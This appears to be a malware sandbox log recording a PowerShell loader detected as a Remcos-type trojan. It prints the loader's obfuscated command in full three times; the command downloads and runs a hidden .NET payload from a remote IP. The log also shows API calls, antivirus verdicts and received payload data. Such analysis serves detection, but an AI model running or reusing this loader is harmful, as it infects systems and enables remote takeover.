process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##PQ#g#Cc#d#B4#HQ#LgBy#G8#ZgBl#HI#ZQBo#G4#bwBz#Gc#bgBp#Gg#d#B0#HM#ZQBi#HQ#ZQBn#HI#bwBm#GU#cgBo#HQ#ZQBn#G8#d#Bl#HY#bwBs#GU#cgBh#Gg#cwBl#Hc#LwBv#GM#YgBr#C8#c#Bw#G0#YQB4#C8#N##4#DE#Lg#0#DQ#MQ#u#Dg#N##y#C4#OQ#w#DE#Lw#v#Do#c#B0#HQ#a##n#Ds#J#By#GU#YwBv#Gw#b#Bp#GQ#aQBu#Gc#I##9#C##J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bi#GU#YgBs#GE#cwB0#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#D##OQ#u#DI#N##4#C4#MQ#0#DQ#Lg#x#Dg#N##v#Hg#YQBt#H##c##v#HY#Yg#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#Z#Bl#HM#YwB1#HI#YQBp#G4#aQBh#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#cgBh#GI#ZQBz#HE#dQBl#GQ#I##9#C##J#Bk#GU#cwBj#HU#cgBh#Gk#bgBp#GE#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#YgBl#GI#b#Bh#HM#d##p#Ds#J#B0#Hc#ZQBy#Gs#aQBu#Gc#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#HI#YQBi#GU#cwBx#HU#ZQBk#Ck#Ow#k#H##ZQBz#GM#YQBk#Gk#d#Bv#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#D0#I##k#HQ#dwBl#HI#awBp#G4#Zw#u#Ek#bgBk#GU#e#BP#GY#K##k#H##ZQBz#GM#YQBk#Gk#d#Bv#Ck#Ow#k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#Ck#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##t#Gc#d##g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bm#G8#cgBl#GY#ZQBu#GQ#aQBu#Gc#I##r#D0#I##k#H##ZQBz#GM#YQBk#Gk#d#Bv#C4#T#Bl#G4#ZwB0#Gg#Ow#k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#I##9#C##J#Bj#HI#bwB5#Gw#cwB0#G8#bgBl#C##LQ#g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Cw#I##k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#KQ#7#CQ#cwBw#G8#cgBp#GM#aQBk#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#KQ#7#CQ#YwBv#G4#bgBp#HY#YQBu#GM#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#HM#c#Bv#HI#aQBj#Gk#Z#Bl#HM#KQ#7#CQ#cgBp#G4#ZwBi#GU#YQBy#GU#cg#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#ZQBj#G8#b#Bs#Gk#Z#Bp#G4#Zw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
cmdline powershell -NoProfile -Command "$Codigo = 'J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##PQ#g#Cc#d#B4#HQ#LgBy#G8#ZgBl#HI#ZQBo#G4#bwBz#Gc#bgBp#Gg#d#B0#HM#ZQBi#HQ#ZQBn#HI#bwBm#GU#cgBo#HQ#ZQBn#G8#d#Bl#HY#bwBs#GU#cgBh#Gg#cwBl#Hc#LwBv#GM#YgBr#C8#c#Bw#G0#YQB4#C8#N##4#DE#Lg#0#DQ#MQ#u#Dg#N##y#C4#OQ#w#DE#Lw#v#Do#c#B0#HQ#a##n#Ds#J#By#GU#YwBv#Gw#b#Bp#GQ#aQBu#Gc#I##9#C##J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bi#GU#YgBs#GE#cwB0#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#D##OQ#u#DI#N##4#C4#MQ#0#DQ#Lg#x#Dg#N##v#Hg#YQBt#H##c##v#HY#Yg#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#Z#Bl#HM#YwB1#HI#YQBp#G4#aQBh#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#cgBh#GI#ZQBz#HE#dQBl#GQ#I##9#C##J#Bk#GU#cwBj#HU#cgBh#Gk#bgBp#GE#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#YgBl#GI#b#Bh#HM#d##p#Ds#J#B0#Hc#ZQBy#Gs#aQBu#Gc#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#HI#YQBi#GU#cwBx#HU#ZQBk#Ck#Ow#k#H##ZQBz#GM#YQBk#Gk#d#Bv#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#D0#I##k#HQ#dwBl#HI#awBp#G4#Zw#u#Ek#bgBk#GU#e#BP#GY#K##k#H##ZQBz#GM#YQBk#Gk#d#Bv#Ck#Ow#k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#Ck#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##t#Gc#d##g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bm#G8#cgBl#GY#ZQBu#GQ#aQBu#Gc#I##r#D0#I##k#H##ZQBz#GM#YQBk#Gk#d#Bv#C4#T#Bl#G4#ZwB0#Gg#Ow#k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#I##9#C##J#Bj#HI#bwB5#Gw#cwB0#G8#bgBl#C##LQ#g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Cw#I##k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#KQ#7#CQ#cwBw#G8#cgBp#GM#aQBk#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#KQ#7#CQ#YwBv#G4#bgBp#HY#YQBu#GM#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#HM#c#Bv#HI#aQBj#Gk#Z#Bl#HM#KQ#7#CQ#cgBp#G4#ZwBi#GU#YQBy#GU#cg#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#ZQBj#G8#b#Bs#Gk#Z#Bp#G4#Zw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -NoProfile -Command "$Codigo = 'J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##PQ#g#Cc#d#B4#HQ#LgBy#G8#ZgBl#HI#ZQBo#G4#bwBz#Gc#bgBp#Gg#d#B0#HM#ZQBi#HQ#ZQBn#HI#bwBm#GU#cgBo#HQ#ZQBn#G8#d#Bl#HY#bwBs#GU#cgBh#Gg#cwBl#Hc#LwBv#GM#YgBr#C8#c#Bw#G0#YQB4#C8#N##4#DE#Lg#0#DQ#MQ#u#Dg#N##y#C4#OQ#w#DE#Lw#v#Do#c#B0#HQ#a##n#Ds#J#By#GU#YwBv#Gw#b#Bp#GQ#aQBu#Gc#I##9#C##J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bi#GU#YgBs#GE#cwB0#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#D##OQ#u#DI#N##4#C4#MQ#0#DQ#Lg#x#Dg#N##v#Hg#YQBt#H##c##v#HY#Yg#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#Z#Bl#HM#YwB1#HI#YQBp#G4#aQBh#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#cgBh#GI#ZQBz#HE#dQBl#GQ#I##9#C##J#Bk#GU#cwBj#HU#cgBh#Gk#bgBp#GE#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#YgBl#GI#b#Bh#HM#d##p#Ds#J#B0#Hc#ZQBy#Gs#aQBu#Gc#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#HI#YQBi#GU#cwBx#HU#ZQBk#Ck#Ow#k#H##ZQBz#GM#YQBk#Gk#d#Bv#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#D0#I##k#HQ#dwBl#HI#awBp#G4#Zw#u#Ek#bgBk#GU#e#BP#GY#K##k#H##ZQBz#GM#YQBk#Gk#d#Bv#Ck#Ow#k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#Ck#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##t#Gc#d##g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bm#G8#cgBl#GY#ZQBu#GQ#aQBu#Gc#I##r#D0#I##k#H##ZQBz#GM#YQBk#Gk#d#Bv#C4#T#Bl#G4#ZwB0#Gg#Ow#k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#I##9#C##J#Bj#HI#bwB5#Gw#cwB0#G8#bgBl#C##LQ#g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Cw#I##k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#KQ#7#CQ#cwBw#G8#cgBp#GM#aQBk#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#KQ#7#CQ#YwBv#G4#bgBp#HY#YQBu#GM#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#HM#c#Bv#HI#aQBj#Gk#Z#Bl#HM#KQ#7#CQ#cgBp#G4#ZwBi#GU#YQBy#GU#cg#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#ZQBj#G8#b#Bs#Gk#Z#Bp#G4#Zw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
filepath: powershell
1 1 0
Symantec ISB.Downloader!gen48
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.Script.Generic
Ikarus Trojan.VBS.RemcosRAT
Google Detected
Varist VBS/Agent.BYY
huorong HEUR:Trojan/VBS.Agent.y
Fortinet VBS/Agent.BYY!tr
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received ²H0÷ÉÛ);äÃf«HʤÝd"°WÙ$ïs“&A*ÆJöɓ™/&辜Y>®2n¥¬^üä„Uóy;äêrd€ä#ã'ß!É é€Œ™:õÀžù:àÃX„º8\ u¼{dS¶OËR:Œ•–-2dÉÓ™;äY1Iý°±qƒËR_ÆOLפНPÿ¸«÷95Ú3áú¯)\Žêlfvn7áÊqòfÛIx˜Ìlñ‹‹ “&L’wÆ`[’qFZQã"«®L'ÎÉ]Æ œ:dÉ&NÙ2ȓ|•ŠW÷É|cJ»d+틔 “&LŠ`ÃÛHrdpaÈMâƒ&L˜&ˆ`DìX í”t' b£Æ 1«fA'L˜²™/ç\„ØâÐ.¾ù2`P›8TYÁ’ë $sƒ&LŠvɓ&I2vɓ$0äɐ ™2fZKɓ&oL9$ɓ& 0Fù¢ictP«D ’X£“&C&£!ó—O³ÊB£œÏöÂI<’ ˜ÅHûàÉ'\0­ç#Öî:dƒ&L™$Á‡&HÊÕy3%ííÎ&]Š›÷wS’Tx4ra¢ÌkA0uÅ+w9÷ÆŠÈßQ¬ ï‡l=²Iƒ €äȬ’dɓv#Ë×&L…L™;å‰2dɒL™2d“&L™ÆónÝÇo¶.LŽâfˆc YŸf¡•ìñ¹í:”N t"À92Z¬™d›lÖU’Ù;dɊAÖ±Þ2€ߜAÁtÒ+ª×a”J‡\‚¯ã 9b jø€dë„|ÔU…ž2ÉdT‘Οr# +ºøö'¾Dˆ$«PöW>ÙÓÔgÙI¼½&NêÖIªÊjÍd*G0Ðœ–zd¿|;à€|$ƒÔa"†<1C|pJ€ã&Cõ’°)“ß&ɪXZÞIˆ2±QC.€Æ!mÊ7W3§ Z³&¦Ld`­ê[ظ²òdÂcÆH2aÂ+½ä‹“¾™ «9sKpî2œ™$Ó®¡uM¼]`í× úklRdè2q‡$ƒƒ“&AˆOŒœƒÇ&TY4‘;‹YŸ¶ä™º¢‰8G_¶ #‹ ƒ¶òC“'\±I߆˾pWÀZð1€£®‘‡®H+¹¡ùœ“–+ù`„êx'+qé»âãF@·íŽ-&7Ò?úl`¤zº‹À~»?ž‰ ‘ÉżѨ–9„Z#®QU‡ÓW m¼°Rƒx·åŒ€;O2W|‡$®L™*ò'ªPq:›ÈI<=1À+'^øxÅ c\dÆÛé»Á\^XƒŠÉM) pÉ Eõa°åÍUXG¦ðpuol‚X¾re³E墟q•ïˆ=rpà¼7ÇÆ);qƒ ã$ZøÈ87šÑb:F'—¿÷Ì´za‹E‰np0Õ •ÍwÉ'Ç+‹ÆÛéùK;d'+×ñÎI(d¾¸k!ëE¯l5ÇL |aüòZƒŒò‚¯Ï*ÎNMa[÷ăqۜ–[ÁÆWߥÇÛ©ÆÇ8e'ÏL•ìpdç¶I2_Æ2¡efºÞ(b…IÝkÁÂöMµ“—ÃòČ==òæ04 UNîÙ&8ÉTxÈ8㠐Ðí *îÜ/|JȲIV À+¾1kè+ß ¸uP ã×^•XyÁXAãbm (òp1éYï|RúcYÙWǶ{“Qã¾0ý²³Ë"Ýò lUr1³íÎCC%W^¸x£c³JªÌK Äjó(bð÷¼0$/Æ,äë„cšd¢Æ2µd«çrF f‡|”EÞJۄäó °HÄ<å€Òž1y¿l)ÒííŽö.vŽØË@=‹$PÄÚÕ`q…†r¢bÿOÛ%Ýs„û–#Q‡ 꾕ŠO&‡#‚xÀxÄQ‡¶ç" ¨ëÎO‚…ÖN}ÿLšºŠOŒ­´ŽãÛ¨›éŽ|ВD±€SŸ{ʔ_\¨ÊÆ¥ÃIÿsp ð}óDå k´®s=ä(ãÂæ97 ½Ô,bœŸÛ- Uz½ÆY¬s+š;{{å@~C”)cXŠ¶Sæ¦î¦ò¦"Æ@ÄUb‘곍¢LcȾ>p¥lµ½ý5Û,ŒzMŠ¼ª@/Ž=°ht'ó¤n²~Üd°""Ş¢°U£ïX÷G?H'ˆÝ÷Á¦`’Y䎞Øu ¹‹ç íÐïJGZ6z
Data received wAGc70BAAp6AnsJDAAEFP4BCwcsCwJzEAgACn0JDAAEAnsJDAAEAwRvEQgACisWH8kf8jKuKw4fih/VMrYrBh9pH8IwswAqPh/+c0wfAAYlAn0NDAAEKk4Ccz8IAAp9CAwABAIoYh8ABgAqkgIoBAAACgArCQIDfQoMAAQrBh9dH5Qw8QIo+AIACn0MDAAEKgAbMAIAPwAAADgAABECewoMAAQKKycGH/0uCCsABhcuAisMAN4HAihPHwAG3CsAAnwPDAAE/hU5AgAbKwYfLh/jMNMCH/59CgwABCoAARAAAAIAFwACGQAHAAAAABswAwD/AAAATgAAEQJ7CgwABAs4xgAAAAcsCCsABxcuBCsHKww4egAAABYK3dgAAAACFX0KDAAEOKwAAAAAAhZ9DgwABDiqAAAAAAICew0MAAR7CAwABG87CAAKfQ8MAAQCH/19CgwABCtRAgJ8DwwABCg8CAAKfRAMAAQAAgJ7DgwAB
Data received G1sAGdldF9UYXNrRGVmaW5pdGlvblhtbABzZXRfVGFza0RlZmluaXRpb25YbWwAZ2V0X091dGVyWG1sAFJlYWRPdXRlclhtbAB4bWwAc2V0X1NlY3VyaXR5UHJvdG9jb2wAVmFyaWFudEJvb2wAQ3JlYXRlSG90UG9vbABob3RQb29sAEZ1bGxDb250cm9sAFN5c3RlbS5TZWN1cml0eS5BY2Nlc3NDb250cm9sAEdldEFjY2Vzc0NvbnRyb2wAU2V0QWNjZXNzQ29udHJvbABGbG93Q29udHJvbABwZGJJbXBsAE1ldGhvZEltcGwAUmVzb2x2ZUludGVyZmFjZUltcGwAUEludm9rZUltcGwAZ2V0X0lzUGludm9rZUltcGwAc2V0X0lzUGludm9rZUltcGwAV3JpdGVJbXBsAFdyaXRlVG9JbXBsAEVycm9ySW1wbABpbXBsAGdldF9VcmwAc2V0X1VybAB1cmwATXVsAHBJU3RyZWFtAGdldF9VU1N0cmVhbQBUb0RhdGFTdHJlYW0AZGF0YVN0cmVhbQBnZXRfUGRiU3RyZWFtAHNldF9QZGJTdHJlYW0AcGRiU3RyZWFtAGdldF9CbG9iU3RyZWFtAGJsb2JTdHJlYW0AVmVyc2lvbmVkU3RyZWFtAGdldF9HdWlkU3RyZWFtAG1kU3RyZWFtAEdldENsb25lZFJlc291cmNlU3RyZWFtAEdldFJlc291cmNlU3RyZWFtAEdldE1hbmlmZXN0UmVzb3VyY2VTdHJlYW0ASUltYWdlU3RyZWFtAEdldENsb25lZEltYWdlU3RyZWFtAENyZWF0ZUltYWdlU3RyZWFtAE1lbW9yeUltYWdlU3RyZWFtAGltYWdlU3RyZWFtAEZpbGVTdHJlYW0AZ2V0X0Jhc2VTdHJlYW0AQ3JlYXRlU3RyZWFtAENyZWF0ZUZ1bGxTdHJlYW0AZ2V0X0Rlc3RpbmF0aW9uU3RyZWFtAENyeXB0b1N0cmVhbQBIZWFwU3RyZWFtAGdldF9UYWJsZXNTdHJlYW0AZ2V0X1N0cmluZ3NTdHJlYW0Ac3RyaW5nc1N0cmVhbQB1c1N0cmVhbQBEb3ROZXRTdHJlYW0AZGVzdFN0cmVhbQBNZW1vcnlTdHJlYW0Ac3RyZWFtAGdldF9HZW5lcmljUGFyYW0AQWRkR2VuZXJpY1BhcmFtAFJlc29sdmVHZW5lcmljUGFyYW0AR2V0T3duZXJPZkdlbmVyaWNQYXJhbQBkbmxpYi5Eb3ROZXQuSU1lbWJlclJlZi5Jc0dlbmVyaWNQYXJhbQBkbmxpYi5Eb3ROZXQuSU1lbWJlclJlZi5nZXRfSXNHZW5lcmljUGFyYW0AUmVzb2x2ZVBhcmFtAEdldE93bmVyT2ZQYXJhbQBwYXJhbQBGcmVlQ29UYXNrTWVtAFJlbQBFbGVtAExkZWxlbQBTdGVsZW0AY21lbQBOZXN0ZWRGYW1BTkRBc3NlbQBOZXN0ZWRGYW1PUkFzc2VtAGdldF9Jc1Rocm93T25Vbm1hcHBhYmxlQ2hhclVzZUFzc2VtAGdldF9Jc0Jlc3RGaXRVc2VBc3NlbQBTeXN0ZW0uQ29sbGVjdGlvbnMuSUxpc3QuSXRlbQBTeXN0ZW0uQ29sbGVjdGlvbnMuSUxpc3QuZ2V0X0l0ZW0AU3lzdGVtLkNvbGxlY3Rpb25zLklMaXN0LnNldF9JdGVtAFNuYXBzaG90SXRlbQBpdGVtAFN5c3RlbS5JTy5Db21wcmVzc2lvbi5GaWxlU3lzdGVtAE9wZXJhdGluZ1N5c3RlbQBnZXRfU3Vic3lzdGVtAGhmbQBTeW1tZXRyaWNBbGdvcml0aG0AQXN5bW1ldHJpY0FsZ29yaXRobQBnZXRfU2lnbmF0dXJlQWxnb3JpdGhtAHNldF9TaWduYXR1cmVBbGdvcml0aG0Ac2lnbmF0dXJlQWxnb3JpdGhtAGdldF9IYXNoQWxnb3JpdGhtAHNldF9IYXNoQWxnb3JpdGhtAFNldEhhc2hBbGdvcml0aG0AQXNzZW1ibHlIYXNoQWxnb3JpdGhtAGhhc2hBbGdvcml0aG0AQWdncmVzc2l2ZVdzVHJpbQBFZmlSb20AUmFuZG9tAGdldF9Gcm9tAHNldF9Gcm9tAExvYWRGcm9tAENhbkNvbnZlcnRGcm9tAGZyb20AQ3VzdG9tAGdldF9TZWN1cml0eURlc2NyaXB0b3JTZGRs